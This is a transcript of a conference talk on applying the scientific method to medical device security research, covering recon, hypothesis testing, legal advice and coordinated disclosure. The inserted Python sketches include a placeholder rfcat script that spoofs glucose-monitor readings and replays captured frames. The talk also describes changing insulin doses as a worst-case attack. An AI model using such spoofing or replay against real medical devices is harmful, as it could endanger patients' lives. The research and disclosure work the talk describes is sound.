The next speaker has been working in the computer security field for over 20 years. The focus of his talk will be walking through how he used the scientific method to conduct the research that led to his 2011 insulin pump findings. And a fun fact: SC Magazine named him one of the top influential IT security thinkers in 2013. I'm blushing. Now, here to present his talk, Using the Scientific Method in Security Research: ladies and gentlemen, Jay Radcliffe.

Thank you. So the thing that I was really impassioned about and wanted to talk about today is that there's a really big problem in the cybersecurity community: we're not taken seriously outside of our own circles. And one of the reasons we're not taken seriously outside of our own circles is that we ignore a lot of what other science fields do, particularly in the area of research. Research is done in a certain way. Traditional sciences like chemistry, mathematics, and medicine have methods for doing this, statistically provable methods. In computer security we kind of just ignore them, right? We grab a box, we pop it, we claim victory, and we move on to the next conference. And that's really amateurish; when people look into our area from the outside, it kind of looks like child's play.

So one of the things I was pushed to do by a friend of mine, who has a PhD in clinical psychology, was this: she said, you should use more traditional research methods and actually follow a methodology, so that your research will be taken more seriously when you present it, especially in the medical world. So when I looked at my insulin pump as a type 1 diabetic, I started to create a method for how I wanted to do that research, and how I was going to conduct it to fall in line with the scientific method.

The computer security industry is very young. This is the 25th DEF CON, so we've probably not been around more than 25 years, and when we compare that to other fields of science, we know we haven't been around that long. We often get looked down upon for many reasons, not just our behavior at parties, the stickers, and our acting out, but also the way we conduct ourselves in our research. We really fail at using traditional research methods, and we need to get back to them.

Now, this is the scientific method. I actually pulled this from a sixth grade science book. Most of us who have gone through the education process recognize it; we learned about it a very, very long time ago. This is where I went back to, to try and figure out how to root my research in these kinds of methods. As I go through each of these stages, I'm going to give you real examples from real devices that I've worked on. We're going to step through each phase of the process to give you an idea of where my mind went and what actions I took at each step of that scientific method. And I think it's important to see how strictly I stuck to that method to accomplish my research.

Stage one is purpose: what do we want to research, and why? This one we have pretty clear, right? We want to make devices more secure. We want to find security vulnerabilities in these devices. And what's the purpose? Well, we want to get root access. I don't think that needs to change.
That's the purpose and the goal of a lot of our research: to go after these devices, to get elevated privileges, to get access to data we shouldn't have access to, and maybe do things to patients that we shouldn't be able to do, to see how safe those patients are.

Stage two, research and observation, is where we get into the real substance of the research. Now, I'm going to walk you through what I do when I'm researching a device. Some researchers do some of this, some don't, and some do more than this. This is just an example.

One of the first things I do is look for the manual. That's kind of surprising, because tech people don't like manuals. But you have to remember that for a lot of these devices, whether we're talking about medical devices or IoT devices, we're not experts. I am not a registered nurse. I do not know how an infusion pump works, perfectly. I do know how an insulin pump works, because I'm a diabetic. But there's a slew of devices out there where I don't know how they work or how they function, and the only way to learn is to read the manual.

There's also a wealth of data in the manual. These manuals are very detailed about how a nurse should interact with the device and how a patient interacts with the device, which tells you a lot about the user interface. They also tell you how the device is programmed. On one particular device, a kidney dialysis machine, there's a password option, and the manual says: please set the password to one, one, one, one, one. That's it. Those were the directions. That was the password that was going to be set on that device. You were not to change that password. You were not to use any password other than that. I found that kind of interesting, but it was right there in the manual.

The other thing these manuals have is troubleshooting sections. Just like in system administration, troubleshooting is how we find a lot of security vulnerabilities. Reading the troubleshooting section in the manual clues me in to where vulnerabilities could be. And that's great. There are also some really juicy tidbits in the manual. The FCC mandates that certain information be published there, which gives you a lot to work with if you want to go after a wireless device. For example, the frequency, the transmit power, the type of modulation: all of those are in the manual. You don't have to go hunting for them. It's not a treasure hunt. It's printed right there.

The other thing that's very interesting to me is that these manuals can be surprisingly hard to get. They're often not on the manufacturer's website. You have to go to eBay and buy them, or buy the CDs that come with the devices, or go to doctors' offices. You can dumpster dive for them, because most doctors' offices don't keep all those manuals around, and they don't consider them private data. It's not a patient record; it's a user's manual. We've all thrown out user's manuals. But these are the ones we need to do our research.

The second step I go through is patent research. Google has a great repository of patents that tell you exactly how the device works. So in a lot of cases, if a manufacturer is going to use an obfuscation method or a made-up cryptography method, they will patent it.
So they'll give you the exact directions on where the bits are shifting and how they're shifting. It's really quite handy. One of the trade-offs of getting a patent is that you give up secrecy: you publish exactly what that device does and how it functions. Very often, especially with the diabetic devices I've looked at, I've learned all the dirty details about how a device communicates, how it works, and the protocols it uses from its patents. They are wordy, they're written by lawyers, and they are very boring to read. But after you get the hang of it, you figure out where the good pieces are and where the boring pieces are.

Another thing that happens a lot in the medical world is that companies purchase ideas from other companies. So I might be working with one device as my target, but its maker has purchased patent rights from other manufacturers so their devices can coexist in the same ecosystem. So you have to look at some of these cross-branded concepts, whether those devices intercommunicate or not. And I might iterate through this multiple times, looking through the patents and hunting down what I'm after.

User knowledge is another area that I love. A lot of these devices, especially the very personal ones, neural stimulators, insulin pumps, the ones the individual patient interacts with, have user forums. And those user forums complain all the time. Oh, if I hit this button and this button, it ends up deleting something. Or, it doesn't work right if I use this function. Well, what are those? Those are bugs. Those are flaws in the software of these medical devices. So by lurking in these communities and forums, you can get a head start on where a lot of the problems in these devices are. You also get an idea of the tips and tricks users rely on. The manual might have a five-step process to do a certain thing, but the users have figured out how to do it in two. They've figured out a hack to make things faster. That is a flaw, and it's something that might be leveraged in your research. You also get an idea of what dumb configurations and default configurations look like, like setting the password to 11111.

Some of my favorite people to talk to in the medical industry are nurses. Nurses are hackers. They know exactly what to do and exactly how to get the fastest and best patient care out of what they're given, and that often is not printed in the manual. They know how to do things one minute faster, three steps faster, because that's their job. So I'm always talking to those frontline people, the nurses and the practitioners using the devices, to figure out exactly how they're using them.

So now we're going to get into some dangerous territory: software and firmware. Collecting and harvesting as much of this as possible is great. Manufacturers often have the firmware posted on their FTP sites, and you can grab it. But here's a big, huge warning: don't open them. Collect them, harvest them. It is not time yet to go poking around and looking inside them. And one of the reasons for that is we haven't looked at the legal liability yet. We're still in reconnaissance mode, still in data collection mode. If you go and start opening and playing with this right now, you could violate the DMCA. You could violate various copyright laws. You could violate the CFAA. And you don't want to do that. It's very hard to hack these devices from a jail cell.
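To make that "harvest, don't open" step concrete: cataloging what you've collected can be as simple as recording file sizes and hashes, so you have a verifiable record of what you gathered and when, without ever unpacking anything. Here's a minimal sketch in Python; the harvest/ directory and manifest filename are hypothetical, and this is not the actual tooling from the talk.

```python
# Minimal sketch: catalog harvested firmware/software without opening it.
# "harvest/" is a hypothetical directory of collected files; nothing here
# unpacks, decompiles, or executes anything -- it only records metadata.
import csv
import hashlib
import os
import time

MANIFEST = "harvest_manifest.csv"

def sha256_of(path):
    """Hash the raw bytes so the collection is verifiable later."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

with open(MANIFEST, "w", newline="") as out:
    writer = csv.writer(out)
    writer.writerow(["path", "bytes", "sha256", "collected_utc"])
    for root, _dirs, files in os.walk("harvest"):
        for name in files:
            path = os.path.join(root, name)
            writer.writerow([
                path,
                os.path.getsize(path),
                sha256_of(path),
                time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
            ])
```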
So I highly recommend that you just harvest these, collect them, and not open them at this point. You can use Google-fu to get zips, binaries, and executables off the web by scoping your searches to the individual manufacturer's domain (think site: and filetype: operators). I also do a lot of stuff on eBay, and I get CDs, DVDs, manuals, floppy disks. Yes, floppy disks, because a lot of these medical devices still use 3.5-inch floppies to hold their configurations and data. You can purchase all that stuff, and you kind of don't know what you're getting. It's like a mystery box. You have to pay attention to the EULAs and click-through agreements to figure out whether or not you're violating the law.

You also want to make note of certain platforms. The example I have here is Medtronic: their insulin devices use a Java platform to push configuration to all those devices. And those Java libraries, I discovered later on, were unobfuscated and completely open to me. That was one of the big steps that led to my success with the Medtronic devices.

We also look at chips and the data sheets for chips. This can be a little harder before we have the device. Remember, we haven't even purchased a device yet. We are in reconnaissance mode, just looking at all the information available. So sometimes this can be hard without actually opening the device and looking at the chips. But news releases are great, because if a chip maker lands a deal for a certain processor, say an MSP430, they'll put out a press release saying, hey, we just got a big contract with this medical device vendor, and they're going to be using our brand new microprocessor. Congratulations: you now know exactly what microprocessor is being used in your target device. You can download the data sheets and start to think about what attack platforms and attack vectors you can use in your research. The example I have here is a chip company called Freescale and an insulin pump maker called Omnipod. They did a joint press release saying Omnipod is going to be using Freescale chips in all of their products. And I was like, sweet, I don't have to crack one open. I know exactly what processor is being used and exactly what memory is being used, because they put it in the press release. So there's a lot of free information out there that you can get.

You can also do some searching on LinkedIn. Does the engineering lead for the device company have a particular background in a chip? They usually list it on their resume, whether they're a Texas Instruments specialist, a Bluetooth engineer, or an ANT engineer. From that you can draw an obvious conclusion: if they're experts on a particular chipset or framework, they're probably using it in that device. The data sheets for these chips really give you an idea of what pins you need to tap. They narrow down what tools you'll need, and they tell you what functions and capabilities the device has. Some of these chips have AES encryption built right onto them; some don't. So you can see what security options are available just by looking at those sheets.

The last step in reconnaissance is legal. At this point, you should think about getting some legal guidance, right?
You've done a ton of research, you've got a lot of data, and if you make a mistake here, you could be looking at a serious fine or jail time, and nobody wants that. That's not fun. In this case, I really love the EFF. I've used them multiple times. They will give you free consultation, and they will help connect you to the right people. What I have them do is draw me a legal box. That legal box tells me what is safe to research and what is not. So one of the things that I could not research, even though I had it, was firmware. At the time I did my research, going into the firmware was a very clear violation of the DMCA, and that was not something I wanted to play around with at all. So I said: I am not going to do anything with firmware in my research, because I want to stay out of jail. They will give you guidance: here's all my reconnaissance, what can I do and what can I not do? This is why it's really important not to go into those binaries or that firmware as soon as you get them. You can't put it back in the box and return it. Once you start, you've committed the violation, and you can't go backwards legally. So be very careful: do your collecting, then the legal work, then dig in.

Stage three is the hypothesis stage. Now, this is generally where computer security research falls apart, because at this point we're so excited and so giddy that we can pop a box, since we have enough information, that we just go out and do it. That's not what I chose to do. The first thing is that you need to be able to replicate these problems, and you need to be able to do it in a credible way. I was really confused about this at first, and I said, well, if you collected a bunch of data on patients, couldn't you just run all the correlations, figure out what correlated, and then say, ah, I found something that correlated? And my friend said no. I think the term she used was that that would be hackish, amateurish bullshit. She said: you have to go into the research with a very specific idea, and be able to prove that idea right or wrong. So I thought about that, and I thought about how to be as specific as possible in computer security research. It was a little bit overwhelming. But here's what I ended up doing.

So, I wear a glucose monitor. It's attached to me on my belly, I change it out every 14 days, and it tells my phone, or a little pager device, what my blood sugar is every five minutes. And the little transmitter runs on a watch battery for a year, okay? Now, I know all this because of all the recon and observation I've done. I also know that I don't have the ability to set the time or date on it, and that the ID is hard-coded: it's printed right on the back, and it's not changeable.

So let's think about this. I've got these observations that I've made: one year on a watch battery, no ability to set time, hard-coded ID. What kind of hypothesis can I draw from that? The first thing I thought was: there's no way this thing can do encryption. Encryption takes a lot of horsepower. It takes a lot of battery. As a rough back-of-the-envelope check: a watch battery holds maybe 200 milliamp-hours, and a year is about 8,760 hours, so the average current budget is only around 20 microamps. If that little watch battery is going to last a year, it's certainly not doing key exchanges and AES encryption. So my first hypothesis is that no encryption is being used. My second hypothesis: since you can't set the time on the device and there's no element of time, how would you prevent a replay attack? Without a clock, the receiver can't know whether a given packet has already been seen or not. So I have another hypothesis.
I think there's a chance that there's no replay attack prevention, nothing like the sequence numbers you'd have in TCP. At this point, we can build experiments and try to figure out whether our hypotheses are true or false. See how different this is from our traditional model of computer security research, where we just go, well, I don't think it uses encryption, so I'm going to blast it, fuzz everything, and figure out if it's broken? This has more methodology to it, more science, going through and building an experiment.

So we think about how to build experiments to prove or disprove the hypothesis that encryption is being used. And the knowledge is more important than the results. Remember, my goal here is to determine whether encryption is being used and whether replay attacks are preventable. I have not mentioned getting root. I have not mentioned taking control of the device. I'm looking at these two specific things.

One of the experiments I did was something very similar to what was done with the Japanese Purple code. When we broke the Japanese codes in World War II, we injected information so we could see what it looked like once it was encrypted. The famous example: we sent a false transmission saying Midway Island had a water condenser problem, and then we picked up a Japanese message saying AF has a water problem. AF, we now knew, was Midway Island. And that's one of the reasons we were able to turn the war around at the Battle of Midway. So here, we can inject known data as input, then look at the output to see how it changes.

We also validate that we're collecting the right data. For example, I know the transmitter ID of the little gizmo I wear, so I'm looking for that transmitter ID in the transmission. I know it's part of the transmission; otherwise the receiver couldn't distinguish me from other devices. And I have three or four of these, so I can start to look at what patterns develop and where that ID is going to sit. Now, one thing that's important to note here: this is very time consuming. You have to collect all those packets and analyze them. You have to sort them and look at where they line up. And small changes make a big difference in how we read that data. So for example, on my little transmitter gizmo, I know that the first chunk of data is exactly the same in every single transmission. If it were encrypted, would it look like that? No. So that confirms my hypothesis that no encryption is being used. Being patient here is going to reward you. I recorded all of my transmitter values alongside what my blood sugar actually was, and then I went through all the packets to figure out exactly how that data was being transmitted.

So the next stage is the fun stage, and that's the analysis and exploitation phase. Now we know what the data looks like, we know where it is, and we know how devices respond to it. So the next thing we can do is build a device to spoof one side of the connection. What I did was use a transmitter, a YARD Stick One, to transmit that ID and whatever I decided the blood sugar value should be. So I was able to replicate what one side of that connection looked like and make the receiving device see that data value.
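Stepping back to the pattern-hunting piece for a second: here's a minimal sketch, in Python, of the kind of byte-position analysis described above. The packets are placeholders, not real captures. The idea is that byte positions that never change across transmissions point to fixed, unencrypted structure, like a constant header or a hard-coded transmitter ID, whereas real ciphertext should vary at almost every position.

```python
# Sketch: test the "no encryption" hypothesis against captured packets.
# PACKETS is a hypothetical stand-in for your real captures (hex strings).
from collections import Counter

PACKETS = [
    "aa5501c3d4200f42",   # placeholder captures -- substitute real data
    "aa5501c3d4210f51",
    "aa5501c3d4220f47",
]

frames = [bytes.fromhex(p) for p in PACKETS]
length = min(len(f) for f in frames)

for i in range(length):
    column = Counter(f[i] for f in frames)
    distinct = len(column)
    marker = "CONSTANT" if distinct == 1 else ""
    print(f"byte {i:2d}: {distinct:3d} distinct values {marker}")

# If the first several positions come back CONSTANT in every capture, that's
# structured, unencrypted data -- exactly what the talk describes seeing.
# Ciphertext under a sane scheme should show near-uniform variation instead.
```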
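And on the spoofing side, driving a YARD Stick One from Python with the rfcat library might look roughly like this. Every protocol detail here, the frequency, modulation, data rate, frame layout, and checksum, is an illustrative assumption, not the actual protocol from this research; you'd recover the real values from your captures and the chip data sheets.

```python
# Sketch: spoofing one side of the RF link with a YARD Stick One via rfcat.
# All protocol details below (frequency, rate, layout, checksum) are
# illustrative placeholders -- recover the real ones from your own captures.
from rflib import RfCat, MOD_2FSK

TRANSMITTER_ID = bytes.fromhex("c3d420")   # hypothetical hard-coded ID
GLUCOSE_VALUE = 120                        # mg/dL value we want displayed

def checksum(payload: bytes) -> int:
    """Placeholder checksum: a simple 8-bit sum. Real devices vary."""
    return sum(payload) & 0xFF

payload = TRANSMITTER_ID + GLUCOSE_VALUE.to_bytes(2, "big")
frame = b"\xaa\x55" + payload + bytes([checksum(payload)])  # preamble+body+sum

d = RfCat()
d.setFreq(916_500_000)          # assumed ISM-band frequency
d.setMdmModulation(MOD_2FSK)    # assumed modulation scheme
d.setMdmDRate(38_400)           # assumed data rate
d.makePktFLEN(len(frame))       # fixed-length frames

d.RFxmit(frame)                 # spoof: receiver sees our chosen value

# Replay-hypothesis test: capture a genuine frame and send it again.
captured, _ts = d.RFrecv()
d.RFxmit(captured)              # if the receiver accepts it, there's no
                                # replay protection (no clock, no counter)
```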
This is also very time consuming, because there are a lot of little details when you transmit data: what the preamble looks like, what the checksum at the end looks like. There are lots of different pieces you need to put together in that puzzle, and it requires real expert knowledge. This is also an area where tools become more useful. When we look at things like Bluetooth, there are specific protocols that say where those fields are and how they line up in the packet structure.

One thing I'll note is that I'm very meticulous about it working every time. When you demo a vulnerability in front of a manufacturer, it had better work. And it had better work ten times out of ten, because if it fails even once, you lose almost all your credibility. So it's not good enough for it to work once. It has to be reliably reproducible.

And here's an important thing that we don't do: one person might go out and do some great research on a particular product, but we don't see a lot of people replicating that research, going back and saying, you know what, I thought that was really cool, I want to replicate that person's research and do exactly what he did, and maybe find more, or validate it and prove it to be true. Right now, almost all of our research is single-sourced, which means one person did the research, published it once, and we accept those results as completely true. No other science does that. In every other science, other people do the exact same research, or 98% of the same research with slight modifications, to validate it and make sure it's true. So it has to be reliably reproducible. You have to have a very good documentation trail of how you did it. It has to work every time. And you have to know how it works and why.

I can't tell you how many presentations I've been to where a researcher says: and then I loaded up Metasploit, pointed it at the device, clicked this button, and boom, I have shell. That's not research, right? That's great, I'm glad you could do that, and it has value, but it is not research. You don't know how that exploit worked. That level of detail is what you need when you go to a manufacturer and say, I found something wrong with your device. If you say, yeah, I bought a tool and pointed it at your device and it popped it, they're going to say: great, now I have somebody I can sue. You can leave. They're not going to help you. You need to know exactly what's going on behind the scenes in order to have that kind of credibility.

The other thing I think about in the analysis stage is the nightmare scenario. What's the worst case? What can I do to this device that would keep people up at night? The user knowledge we talked about, those community forums, the nurses, those manuals we looked at, that's where those scenarios come out. And the most obvious thing might not be the worst. For example, you could turn an insulin pump off. And that's bad, right? Diabetics need insulin. But that is not the worst thing you can do. The worst thing you can do is change the therapy settings, so that instead of getting one unit of insulin, I get ten units. And then two hours later, when I'm on the floor in a coma, I have no idea what happened. That's the nightmare scenario, not turning off the device.
So the most obvious thing might not be the worst, and that's where real specialized knowledge comes in. This is similar to hypothesis building, and it's very similar to the threat modeling we do in traditional computer security, where we look at different threat actors and try to figure out exactly what they're going to do and how we can stop them. In this case, we're doing it backwards: we're trying to figure out exactly what the worst thing is, and how to make it happen.

And remember, please, please, please: these devices are very serious, okay? Every time I experimented with vulnerabilities on my insulin pump, I removed it from my body first, okay? I'm not crazy. These devices are very serious. They can kill you, and they keep people alive. So be safe. Don't do anything haphazard, like leaving the device hooked up to yourself while you run an exploit. Probably a bad idea.

One of the more controversial and heavily discussed topics is disclosure and publishing. This is a topic I take very seriously, because it's not so much difficult as it is scary. When you present findings to a medical device manufacturer, you could be threatening to put them out of business. If their device gets recalled by the FDA, that could be the end of them if they're a small device manufacturer. So they are going to do everything possible to protect themselves. You also have to realize that, like I said, these devices keep people alive. They keep people healthy. That is really important, and when you go after that and say, I can do something bad with this, you're going to get some backlash, because people take it very personally. I have a very big stack of emails from parents who did not like my research at all, because they said I was showing people how to do bad things to their kids, showing them how to be terrorists. And I'm not; I'm making these devices better. But that's their first reaction, because they want to protect their children, to protect the people they love. You have to keep that in mind.

Also, your career might be at risk. Nobody likes somebody who's a little too maverick. After my Medtronic research, I did not leave my company; I was fired. And I was fired because they wanted full control over who I talked to, what I talked about, and what I researched. I was uncomfortable with that, because if it had been up to them, that research would never have been published, and we wouldn't know anything about insulin pump vulnerabilities. Well, at least not at that point.

So you're really putting yourself out there. It's a heavy personal investment: a year and a half to two years of research for each of the two insulin pumps I've worked on. And when you spend that much time honing something and making it perfect, and you present it and somebody says, that's horrible, you really take it personally. There's an emotional connection to that research. That's one of the reasons we try to find an intermediary to disclose through: ICS-CERT, the Department of Homeland Security, the FDA, all very viable options. If you're doing this research, maybe you shouldn't go to the manufacturer directly. I always, always, always go through one of those agencies. And we have a standardized process at Rapid7 for how we do that.
We notify ICS-CERT, we wait 10 days, we notify the company, we wait 45 days, then we go public. That's our standard procedure. Sometimes that changes. If we see that a manufacturer genuinely needs more time and is genuinely working hard, we will give them more time. We gave Johnson & Johnson six months, because they needed that time to move their giant ship of a company into alignment. But they were very genuine and very forthcoming: yes, these are vulnerabilities, we want to notify our patients, and we want to do the right thing. When a company is acting like that, I have no problem at all waiting, because that's what's important. We went out with a message that didn't freak patients out, and that's really important when we're talking about these types of devices.

Also, in disclosure, you want to loop in the EFF and legal counsel as soon as possible. You can expect to be bullied. You can expect cease and desist letters. You can expect to be sued. So be careful what you ask for when you get into this research. You might find really cool things, but you might also increase your stress levels and shave years off your life.

The next thing I'll say is difficult, but it's true: don't expect them to do anything. You might find something. You might pop shell. You might think it's the worst thing in the world. And they might think: whatever. We're not going to do a thing. We're not going to patch that. It's not important to us. And that might blow your mind, but it happens. So don't get your hopes up that something drastic is going to change and the manufacturer is going to say, whoa, we can get a patch out for that next week. More often than not it's a very slow process, and sometimes the outcome is that nothing happens. Medical companies are big and highly regulated, and that makes things very complicated. We're not talking about a game on an iPhone that you can just patch and push to the app store. It's a lot more complicated than that. The desire might be there, but other factors get in the way.

So for example, Johnson & Johnson. We think: notify your customers, shoot out an email, it's a five-minute process. Johnson & Johnson's process was to send a registered letter to every customer and every doctor. That's quite a production. And it was very eye-opening for Rapid7 and for me: wow, you do have a process, you want to follow it, and I totally want to respect that. But mail? Like, stamps? For realsies? And it's true; I still have the letter they sent, because I was a patient. That's how I got the device. They sent out a letter, and we had to time our public disclosure to when the first person got the first letter. We didn't want it to come after they got the letter, because that would be confusing, and we didn't want it to come before the letter, because that would be confusing to patients as well. So we had to ask, okay, did you send it first class? How exactly does that work? It was very eye-opening. So you have to consider these other factors, because they are unique to the medical industry.

Relationships are the key to this. I have a very good friend now at Johnson & Johnson. His name is Colin Morgan. He's very active in our community; he's given talks at DEF CON and BSides, and he heads up security at Johnson & Johnson. I have a great relationship with him now. And that relationship, and your reputation as a researcher, helps that company.
It helps that company understand security, so that the next time a vulnerability gets reported to them, they know what to do and what to expect. And word spreads quickly. If you do an unethical, crappy job of disclosing, you will get sued a lot more. But if you behave yourself and cooperate with companies, you get a reputation for being on their side, for being helpful. And that makes things go a lot easier.

The talk before this one demonstrated that speaking publicly can be very tricky. There are legal issues. There are relationship issues. Sometimes companies say, hey, I'd prefer you didn't go to that DEF CON thing and tell 27,000 people we have a big vulnerability in our device. That can crush a relationship. So you have to be very careful about how often you speak, where you speak, and what position you're taking in those talks. You also really have to think about something else: what's there to gain? Are you doing this to make yourself a rock star, or is it really helping the cause? Does giving a presentation about how you popped root on an MRI machine raise awareness? Does it really move the ball forward? Is that what we need? There's a lot to think about when you present on medical devices and IoT devices in our space: what's going to make an impact on the community and actually be helpful.

There's a second part to this publishing thing that I think is really, really important, and that I really want our community to take hold of: being wrong is just as important as being right. What if my hypothesis was that they don't use encryption, and I grabbed all the packets and they're all random? I ran statistical analysis on them and they're totally random. It's definitely encrypted. It's definitely highly obfuscated. No packet is the same. In that case, I'm wrong. Just flat out wrong. In our community, you know what happens at that stage? We throw it away. Nobody cares about a device being secure. How many talks do you hear like: hey, I did a bunch of research on this medical device, and you know what, it turned out to be really good. They have passwords, they use encryption, they've got good key storage, and I was impressed. My research concluded that I would feel comfortable using this product. You know what? Every other science does that. When they do an experiment and the research doesn't line up with their hypothesis, they publish it anyway, because it adds to the collection of knowledge. It adds to the community's knowledge: hey, we have examples that show the counterpoint, cases where the manufacturer succeeded.

The example I'll give is a blog post I did about the company Dexcom, whose sensor I wear. They pushed a firmware update, and it was the first time I'd ever seen a medical device where the customer pushes a firmware update to their own device. You could download it off their website, plug a USB cable into the little pager device that receives the blood sugar readings, and it pushes new firmware to the processor. I thought: we've never seen this before. I'm sure this is going to be full of holes. This is going to be crap. So I downloaded the binary, I went through all my recon steps, and you know what I found? Signed firmware. Encryption being used. Updated transmissions with better protection against replay attacks.
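For context on what finding signed firmware means: the updater only accepts an image whose signature verifies against a key the vendor controls, so a tampered binary gets rejected before it's ever flashed. Here's a minimal sketch of that kind of check using Python's cryptography library; the filenames and the RSA/SHA-256 scheme are assumptions for illustration, not Dexcom's actual design.

```python
# Sketch: what a signed-firmware check looks like conceptually.
# Filenames and the RSA-PKCS1v15/SHA-256 scheme are illustrative assumptions.
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding

with open("vendor_pub.pem", "rb") as f:
    pubkey = serialization.load_pem_public_key(f.read())

with open("firmware.bin", "rb") as f:
    image = f.read()
with open("firmware.sig", "rb") as f:
    signature = f.read()

try:
    pubkey.verify(signature, image, padding.PKCS1v15(), hashes.SHA256())
    print("signature OK: the device would accept this image")
except InvalidSignature:
    print("signature BAD: a tampered image gets rejected before flashing")
```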
I was impressed. So I wrote a blog article and called them out, and I said: hey, I do security research, I was expecting to find a mess, and what I actually found was that this manufacturer did a pretty good job. Was it perfect? No. But you know what? Good on them. Good for doing what's right, actually listening to the security community, and advancing things. I never see that, and I really would like to see more of it. I would love to see research where people say, you know, I tried this thing and it didn't work out. That's valuable. Those techniques and that knowledge help everybody in the community become better researchers and build a bigger collection of knowledge. And it gives us examples, when we go to these conferences and talk to these vendors, of who is doing it right, instead of just focusing on how everybody is doing it wrong. We have to look to other fields of science and model what they're doing, because they've been doing it for hundreds of years. They've crafted something that's been extremely successful, and we can't just say, huh, that's trash, it doesn't apply to us, we'll just do our own thing. We have to learn, and we have to take that into consideration.

So, as a conclusion: I want you to do more than just wildly pop devices as fast as you can and pen test them. I want you to follow a method. Even if that method is out of your sixth grade science book, it's very valid. That's what science uses, and it's what we should be using. And lastly, I want you to publish. Even if you think you found nothing, your methods and your results help build the community. They make our research better, and they make our research look more credible from the outside, which is something we desperately need, especially in the medical field, because publishing is what they do for a living. And when we come in there with our wild haircuts and our hoodies on and say, hey, we popped your device, we're not going to gain ground. We're not going to succeed at making the world a safer place. We have to use some of their methodologies in order to make an impression on them. And that is all I have. If you have any questions, we have about 10 minutes, and I'd love to take some. Hmm? Oh, we do. All right, so we have time. If you have a question, come up to the microphone. Don't be bashful.

Did Johnson & Johnson end up patching? Did they actually patch, or did they just send a letter?

So here's what we ended up doing. One of the reasons it took six months is that their firmware is not updatable. A lot of these medical device manufacturers hard-code the device so it can't be updated, because that was considered secure when they built it 20 years ago. There are workarounds, though. One completely resolves the issue: you can turn the wireless off on the device. That fixes the problem; there's no more wireless vector. So people who are very concerned can do that. We also published two additional remediation steps. One is that you can turn on alerting, so you get alerted any time medicine is delivered; that way, if there were an unauthorized dose of medicine, you would know about it. The second, for children, is to lower the maximum dose, because an insulin pump will only deliver so much in a day. You can lower that limit to something more realistic, and that means an attack might not reach the life-threatening range. It would still be bad, but recoverable.
So one of the important things is that Rapid7 and Johnson & Johnson came out with exactly the same language and the same press release on what those solutions were. We wanted patients to feel very secure, and not to think: Rapid7 says this, Johnson & Johnson says that, and they totally don't align. We wanted that message to go out the same way, and we wanted patients to feel very safe and secure. Yep?

You mentioned that our community doesn't always do a good job of reproducing other researchers' results. When a researcher publishes a proof of concept and people are able to run it on their own, isn't that an effective way of reproducing results?

Not really, because you run that proof of concept against devices that are configured totally differently, and there's no methodology there. Proof of concept code is like popping a shell; it's a Metasploit module. I don't think that's reproducing research. I don't think it adds to the collective knowledge. It's testing a tool, but it's not adding to the pool of knowledge that is security research, the way research is done in other fields.

Oh, I agree with you on that, but you have to agree that it's a method of verifying that the research they published was in fact valid.

That verification is different from expanding on the research. Right, yes, of course: I do agree that it validates it. It proves that research data point is true, but it doesn't expand upon it, and that's really more what I'm looking for, or what I think should be looked for.

I'm wondering about a repository of publications, something that could be part of your literature review. When you do research, you have to see what other people have done; you don't want to do the same thing. I noticed you mentioned a couple of spots where you collect your raw material, like Google and patents. Do you actually go to a repository of the literature available in that specific field that would be helpful for your research? And are you contributing your research results to the community, if there is a repository of that literature, so it can benefit other people?

Yes. I think the way we do that is much more in line with doing talks. When I did the talk in 2011, and in the subsequent talks I do, I talk about the methodologies I used in my research, so that other researchers can use those methods. We don't really have a great centralized place to publish research, and I think that's a weakness, right? We don't have a scientific journal of security research. I've been asked to publish some of my security research in medical journals, and the pushback I always get is that it's not scientific enough: I didn't use a big enough sample size, I'm not using traditional statistical methodologies. So I need to up my game to get into some of these medical journals and get published in those areas. It's a challenge for me to do better on that. And sometimes I get overwhelmed looking at scientific research articles, because I can't keep up with what some of these doctors are doing.

Yes, it's a giant amount of work: you have to do all the repeats, collect your data, and be convincing. And that's just the beginning of getting into the medical area.

Exactly. Yeah, you have to work your way up.
So yeah, I think in future research I'd like to do more white papers, to build up more of that publishable material. But we'll see how that goes. Great, thank you. Yep?

Thank you very much for your talk. Just a follow-up to the previous question: do you think we as a community should have a journal of cybersecurity, instead of just publishing blog posts or YouTube videos?

Yeah, I think that would be great. Here's the other struggle. There's PoC||GTFO, Proof of Concept or Get The Fuck Out. Okay, I can't take that into the medical world. Can't. Right? I love our community; sometimes it drives me a little nuts, because we take things too flippantly. We do need something that I can take into the medical world or the legal world and say, no, seriously, this is a credible journal, you can publish in this. What does it stand for? Uh, don't worry about it, the letters don't mean anything. Sometimes we shoot ourselves in the foot. We do have methods to publish, and then we choose to be a little more immature about them than we need to be. That's tough, because we like to have fun. Everybody wants to have fun. But there are times we need to tone it down a little, I think.

I've given this talk at DerbyCon and at a couple of BSides events. I try to get out as much as I can to do talks, but it depends on my travel schedule and my work schedule. I also spend a lot of time now focused on speaking outside of our community. I was at a diabetes technology conference earlier this year; I've been to geriatric conferences; I've been to different medical and legal conferences, to try to spread our knowledge and get more people involved. Yeah, yeah, absolutely. All right, thank you guys very much.